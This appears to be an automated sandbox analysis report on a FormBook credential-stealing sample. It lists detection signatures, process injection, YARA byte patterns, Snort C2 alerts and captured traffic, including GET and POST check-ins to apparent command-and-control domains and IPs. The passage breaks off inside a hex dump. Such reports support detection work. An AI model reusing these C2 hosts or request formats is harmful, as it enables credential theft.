Windows Analysis Report
indent PWS-020199.exe

Overview

General Information

Sample name:indent PWS-020199.exe
Analysis ID:1465309
MD5:66800cae69c4278c8a33921d624b7528
SHA1:e3abc9476cde1dc7ca5a2baa546534d625c0d325
SHA256:64874958438945a29c66851bb23bcb9483955577e941e156d559885cca4a6910
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • indent PWS-020199.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\indent PWS-020199.exe" MD5: 66800CAE69C4278C8A33921D624B7528)
    • indent PWS-020199.exe (PID: 7604 cmdline: "C:\Users\user\Desktop\indent PWS-020199.exe" MD5: 66800CAE69C4278C8A33921D624B7528)
      • lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe (PID: 5424 cmdline: "C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netiougc.exe (PID: 7984 cmdline: "C:\Windows\SysWOW64\netiougc.exe" MD5: DD8D09523CDB5610078DF64BA4889806)
          • lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe (PID: 4320 cmdline: "C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7220 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ac40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x141bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2df03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17482:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.indent PWS-020199.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.indent PWS-020199.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2d103:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16682:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.indent PWS-020199.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.indent PWS-020199.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2df03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17482:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            No Sigma rule has matched
            Timestamp:07/01/24-15:12:03.875197
            SID:2855464
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-15:12:44.166991
            SID:2855464
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-15:12:17.123480
            SID:2855464
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-15:12:46.704903
            SID:2855464
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-15:12:30.379024
            SID:2855464
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-15:12:33.079742
            SID:2855464
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-15:12:06.407420
            SID:2855464
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-15:12:19.661497
            SID:2855464
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            AV Detection

            Source: https://www.mareomnia.com/ya74/?dBOL8fg=Avira URL Cloud: Label: malware
            Source: indent PWS-020199.exeReversingLabs: Detection: 68%
            Source: Yara matchFile source: 2.2.indent PWS-020199.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.indent PWS-020199.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1974143333.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2905770079.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1975485544.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: indent PWS-020199.exeJoe Sandbox ML: detected
            Source: indent PWS-020199.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: indent PWS-020199.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: netiougc.pdbGCTL source: indent PWS-020199.exe, 00000002.00000002.1973943297.0000000001028000.00000004.00000020.00020000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000003.1911897323.0000000000984000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000000.1897417864.000000000063E000.00000002.00000001.01000000.0000000C.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2904164622.000000000063E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: WsRG.pdb source: indent PWS-020199.exe
            Source: Binary string: wntdll.pdbUGP source: indent PWS-020199.exe, 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000003.1973990257.0000000003656000.00000004.00000020.00020000.00000000.sdmp, netiougc.exe, 00000007.00000003.1975995160.000000000380A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: indent PWS-020199.exe, indent PWS-020199.exe, 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, netiougc.exe, 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000003.1973990257.0000000003656000.00000004.00000020.00020000.00000000.sdmp, netiougc.exe, 00000007.00000003.1975995160.000000000380A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: WsRG.pdbSHA256 source: indent PWS-020199.exe
            Source: Binary string: netiougc.pdb source: indent PWS-020199.exe, 00000002.00000002.1973943297.0000000001028000.00000004.00000020.00020000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000003.1911897323.0000000000984000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_0322BF20 FindFirstFileW,FindNextFileW,FindClose,7_2_0322BF20
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 4x nop then xor eax, eax7_2_03219740
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 4x nop then pop edi7_2_0321E11F
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 4x nop then pop edi7_2_03222438
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 4x nop then pop edi7_2_0322241D
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 4x nop then mov ebx, 00000004h7_2_038C0542

            Networking

            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49746 -> 66.96.162.130:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49747 -> 66.96.162.130:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49750 -> 203.161.49.220:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49751 -> 203.161.49.220:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49754 -> 142.250.74.211:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49755 -> 142.250.74.211:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49758 -> 43.132.189.227:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49759 -> 43.132.189.227:80
            Source: DNS query: www.hellokong.xyz
            Source: Joe Sandbox ViewIP Address: 66.96.162.130 66.96.162.130
            Source: Joe Sandbox ViewIP Address: 203.161.49.220 203.161.49.220
            Source: Joe Sandbox ViewASN Name: LILLY-ASUS LILLY-ASUS
            Source: Joe Sandbox ViewASN Name: BIZLAND-SDUS BIZLAND-SDUS
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /ya74/?dBOL8fg=+abYdz9ZYlLEbZ/R8RLwLrW/kpiL94aSgfCN/SysWjNm4examNIgFJUZ1S4grBE9mVFVJZjp+t7n4tylmkX4sWpke5fB/OP37jtsRm5e/rz0DcENl95vd9o=&9Zed=oJfxPJMXK HTTP/1.1Host: www.mareomnia.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /7w6o/?dBOL8fg=Iwh3SuFj0OMFYPToOdaCt8n09YMWVwcBCXZ5uIfRfjsROf0gJ1Ep/RQuBjSxRyYqk6VMa+wJUYkrYqg42OI1bOM95Oj9JPajS4UzxvnlYuQuHl4yeh0Z5Q8=&9Zed=oJfxPJMXK HTTP/1.1Host: www.netgain360.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ov93/?dBOL8fg=4u4yCo7OQPMCdKi2Ln8aiJAigi9vuRKQeDagcagOc8nEJXUOPucQWQe7OcI8vFTvM/uLBaUz+qY2H3sZqNwpjFxKCsR2JAuqbshkvfKiRYpiG9JChfURZOQ=&9Zed=oJfxPJMXK HTTP/1.1Host: www.hellokong.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /jabf/?dBOL8fg=KGlDdtURhni7FGDH6yxlaDZJCfDxicUCgkjw8qWMo8hYydwJ4O2FhRAQ8quBHC5UmxGRc9Sg3+2UwlJVOzJUF0A3C6dQyjGkFiMq3W6NxA+1TkWWAbsUMwI=&9Zed=oJfxPJMXK HTTP/1.1Host: www.artvectorcraft.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /3mcu/?dBOL8fg=QfUAqqYGVyzbjiAj2dnUBJSNi+zHRF4Q6sDLQeB06Snd2Ev4mrer+JTsXVK5M0bFA+ayvTGmBhRWLdOOcrwm0o86bnORrWDNmfnIiMMD3+9d3oxlAeCDNso=&9Zed=oJfxPJMXK HTTP/1.1Host: www.eylmpwjot.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.xxikcn20.icu
            Source: global trafficDNS traffic detected: DNS query: www.mareomnia.com
            Source: global trafficDNS traffic detected: DNS query: www.netgain360.online
            Source: global trafficDNS traffic detected: DNS query: www.hellokong.xyz
            Source: global trafficDNS traffic detected: DNS query: www.artvectorcraft.store
            Source: global trafficDNS traffic detected: DNS query: www.eylmpwjot.store
            Source: unknownHTTP traffic detected: POST /7w6o/ HTTP/1.1Host: www.netgain360.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-usOrigin: http://www.netgain360.onlineContent-Length: 204Connection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedReferer: http://www.netgain360.online/7w6o/User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36Data Raw: 64 42 4f 4c 38 66 67 3d 46 79 4a 58 52 62 31 78 2b 66 49 34 63 38 66 6d 57 2b 79 47 6c 64 50 42 2b 4a 77 4e 65 44 38 63 63 42 68 42 6f 59 69 62 66 52 6b 59 50 76 67 74 47 45 41 4c 2f 77 4e 54 44 6a 4b 63 64 57 31 39 69 35 52 65 63 75 49 73 52 72 59 4e 5a 64 6c 73 36 38 41 4c 66 63 46 67 39 63 50 55 45 49 7a 79 54 49 42 59 68 74 43 30 4c 6f 51 43 43 43 77 78 4c 51 30 61 37 44 54 79 72 37 78 70 79 4a 6e 69 45 4d 73 79 32 69 72 65 41 32 64 32 48 58 67 74 6b 32 33 65 34 5a 6d 34 69 6f 6a 4b 79 70 78 69 69 42 72 67 30 76 66 72 4f 45 68 72 50 58 2b 55 43 71 30 2f 58 41 44 33 77 6a 33 67 79 58 68 33 42 41 3d 3d Data Ascii: dBOL8fg=FyJXRb1x+fI4c8fmW+yGldPB+JwNeD8ccBhBoYibfRkYPvgtGEAL/wNTDjKcdW19i5RecuIsRrYNZdls68ALfcFg9cPUEIzyTIBYhtC0LoQCCCwxLQ0a7DTyr7xpyJniEMsy2ireA2d2HXgtk23e4Zm4iojKypxiiBrg0vfrOEhrPX+UCq0/XAD3wj3gyXh3BA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:04 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 
74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:06 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 
74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:09 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 